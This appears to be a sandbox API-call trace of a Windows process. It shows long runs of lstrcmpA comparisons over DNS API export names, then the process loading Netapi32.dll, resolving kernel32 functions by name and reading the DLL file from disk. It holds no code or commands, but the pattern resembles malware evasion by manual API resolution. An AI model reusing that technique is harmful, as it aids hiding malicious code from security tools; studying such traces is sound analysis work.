[0127.456] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.456] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0127.456] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.456] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.456] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0127.456] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0127.456] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.456] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.456] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0127.456] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0127.456] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0127.456] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.456] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.456] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0127.456] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0127.456] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.456] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0127.456] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.457] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.457] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0127.457] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0127.457] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.457] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0127.457] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0127.457] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.462] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.462] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0127.462] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0127.462] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.463] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0127.463] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0127.463] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0127.463] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0127.464] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.464] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0127.464] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0127.464] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0127.464] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.464] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.464] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0127.465] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0127.465] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0127.466] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0127.467] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0127.467] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.467] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.467] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0127.467] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0127.467] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.467] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0127.467] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0127.467] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0127.467] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0127.468] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0127.468] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0127.469] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.469] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0127.470] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0127.470] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.470] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.470] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0127.470] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0127.470] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.470] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.471] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0127.472] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0127.473] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0127.473] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0127.473] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0127.473] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0127.473] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0127.473] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0127.474] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0127.486] GetProcessHeap () returned 0x590000 [0127.486] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x3a3d010 | out: hHeap=0x590000) returned 1 [0127.486] GetProcessHeap () returned 0x590000 [0127.486] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9340 [0127.487] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0127.491] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0127.491] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0127.491] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0127.491] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.492] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0127.492] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0127.492] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0127.492] GetProcessHeap () returned 0x590000 [0127.492] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13b00) returned 0x2d05030 [0127.492] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0127.493] ReadFile (in: hFile=0x17c, lpBuffer=0x2d05030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d05030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 